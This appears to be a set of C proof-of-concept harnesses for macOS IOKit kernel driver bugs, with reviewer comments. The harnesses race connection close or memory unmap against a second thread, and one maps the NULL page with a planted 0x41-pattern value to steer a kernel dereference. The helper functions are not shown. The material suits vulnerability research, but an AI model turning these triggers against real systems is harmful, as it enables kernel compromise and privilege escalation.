// Proof-of-concept driver for an "IOUSBInterface" user client (type 0).
//
// Sequence: open the user client, call map_payload() with a fixed 64-bit
// value, then issue one call on the connection through make_call().
//
// get_user_client(), map_payload() and make_call() are defined elsewhere.
// NOTE(review): what gets mapped and which selector is invoked is not visible
// here. The 0x41-filled constant is presumably a marker chosen so that a
// resulting fault address is easy to recognise in a panic log -- confirm.
int main(int argc, char** argv)
{
    mach_port_t usb_client = get_user_client("IOUSBInterface", 0x0);

    map_payload(0xffff414141414141);
    make_call(usb_client);

    return 0;
}
// Race harness for an "IntelAccelerator" user client (type 6).
//
// The caller's thread takes the global spinlock before the second thread is
// created, configures the connection, and only then releases the lock and
// closes the connection straight away.
//
// NOTE(review): thread_func and set_params are defined elsewhere. Presumably
// thread_func blocks on the same lock and then calls into the connection, so
// that its call overlaps IOServiceClose() -- confirm. If so, this checks
// whether teardown of the user client is serialised against in-flight calls.
void poc()
{
    pthread_t racer;
    mach_port_t accel_conn;

    // Hold the lock first so the second thread cannot run ahead of the setup.
    OSSpinLockLock(&lock);
    pthread_create(&racer, NULL, thread_func, NULL);

    accel_conn = get_user_client("IntelAccelerator", 6);
    set_params(accel_conn);

    // Release the other thread and close the connection back to back.
    OSSpinLockUnlock(&lock);
    IOServiceClose(accel_conn);

    pthread_join(racer, NULL);
}
// Race harness for an "IOHDIXController" user client (type 0).
//
// The main thread takes the global spinlock, starts a second thread, opens
// and configures the connection, then loops forever: each iteration unlocks
// the spinlock and calls make_iokit_call().
//
// NOTE(review): thread_func, set_params and make_iokit_call are defined
// elsewhere. make_iokit_call() takes no argument, so it presumably works on
// state that set_params() stored globally -- confirm. The loop never exits,
// so the trailing return is unreachable and the thread is never joined.
int main(int argc, char** argv)
{
    pthread_t racer;
    mach_port_t hdix_conn;

    // Lock is taken before the second thread exists.
    OSSpinLockLock(&lock);
    pthread_create(&racer, NULL, thread_func, NULL);

    hdix_conn = get_user_client("IOHDIXController", 0);
    set_params(hdix_conn);

    // The unlock is repeated on every pass, not just the first one.
    while (1) {
        OSSpinLockUnlock(&lock);
        make_iokit_call();
    }

    return 0;
}
// Two-thread harness around map/unmap of user memory on an IOAccelerator
// GL context.
//
// Steps visible here:
//   1. open user client type 1 (an IGAccelGLContext) into gl_context;
//   2. open user client type 6 (an IGAccelSharedUserClient);
//   3. attach the GL context to the shared client with IOConnectAddClient(),
//      which is needed before the context can be used;
//   4. map user memory on the context and keep the handle;
//   5. start a second thread while holding the spinlock, wait 100 ms,
//      release the lock and unmap the handle from this thread.
//
// gl_context and handle are assigned but not declared here, so they are
// file-scope variables shared with the second thread.
// NOTE(review): go() is not shown. Presumably it waits on the lock and then
// operates on the same handle, so both threads touch one mapping at about the
// same time -- confirm. If so, this checks whether the kernel serialises
// unmap of a single mapping across threads.
int main(int argc, char** argv)
{
    mach_port_t shared_client;
    kern_return_t status;
    pthread_t worker;

    // IGAccelGLContext
    gl_context = get_user_client("IOAccelerator", 1);

    // IGAccelSharedUserClient
    shared_client = get_user_client("IOAccelerator", 6);

    // The GL context is unusable until it is attached to the shared client.
    status = IOConnectAddClient(gl_context, shared_client);
    if (status != KERN_SUCCESS) {
        printf("IOConnectAddClient error: %x\n", status);
        return 0;
    }
    printf("added client to the shared UC\n");

    handle = map_user_memory(gl_context);

    // Start the second thread with the lock held, then give it 100 ms to
    // come up before the lock is released.
    OSSpinLockLock(&lock);
    pthread_create(&worker, NULL, (void*) go, NULL);
    usleep(100000);
    OSSpinLockUnlock(&lock);

    unmap_user_memory(gl_context, handle);
    printf("called unmap from main process thread\n");

    pthread_join(worker, NULL);
    return 0;
}
// Harness that remaps page zero read/write, fills it, and then races a close
// of an "IOAudioEngine" user client (type 0) against a second thread.
//
// Visible steps:
//   1. deallocate 0x1000 bytes at address 0 and allocate 0x1000 bytes with a
//      requested address of 0 and flags 0; failures are only printed, the
//      program carries on regardless;
//   2. fill the page with 0xff bytes and store a fixed 64-bit value at
//      offset 0x28;
//   3. take the spinlock, start thread_func, open and configure the user
//      client, release the lock and close the connection.
//
// The second thread is not joined; main falls off the end right after the
// close.
//
// NOTE(review): thread_func and set_params are defined elsewhere. The write
// at 0x28 presumably stands in for a field that kernel code would read
// through a NULL object pointer -- confirm. This setup only works where user
// space is allowed to map page zero; hardening that forbids such mappings
// removes that precondition.
int main(int argc, char** argv)
{
    enum { NULL_PAGE_LEN = 0x1000 };

    kern_return_t err;

    // Remap the null page read/write.
    int var = 0;

    err = vm_deallocate(mach_task_self(), 0x0, NULL_PAGE_LEN);
    if (err != KERN_SUCCESS) {
        printf("%x\n", err);
    }

    vm_address_t addr = 0;
    err = vm_allocate(mach_task_self(), &addr, NULL_PAGE_LEN, 0);
    if (err != KERN_SUCCESS) {
        switch (err) {
        case KERN_INVALID_ADDRESS:
            printf("invalid address\n");
            break;
        case KERN_NO_SPACE:
            printf("no space\n");
            break;
        default:
            break;
        }
        printf("%x\n", err);
    }

    // Deliberate writes through address 0: valid only if the mapping above
    // succeeded.
    char* np = 0;
    for (int off = 0; off < NULL_PAGE_LEN; off++) {
        np[off] = '\xff';
    }

    *((uint64_t*)0x28) = 0xffffff4141414141;

    // Lock is held while the second thread is created and the client is set
    // up; unlock and close then follow back to back.
    OSSpinLockLock(&lock);
    pthread_t t;
    pthread_create(&t, NULL, thread_func, NULL);

    mach_port_t audio_conn = get_user_client("IOAudioEngine", 0);
    set_params(audio_conn);

    OSSpinLockUnlock(&lock);
    IOServiceClose(audio_conn);
}
// Minimal driver: opens user client type 5 on "IOAccelerator" and makes a
// single release_device_texture() call on it.
//
// NOTE(review): get_user_client() and release_device_texture() are defined
// elsewhere; which external method is invoked and with what arguments is not
// visible here. No prior setup call is made on the connection before the
// release, which is presumably the condition being exercised -- confirm.
int main(int argc, char** argv)
{
    mach_port_t accel_client = get_user_client("IOAccelerator", 5);

    release_device_texture(accel_client);

    return 0;
}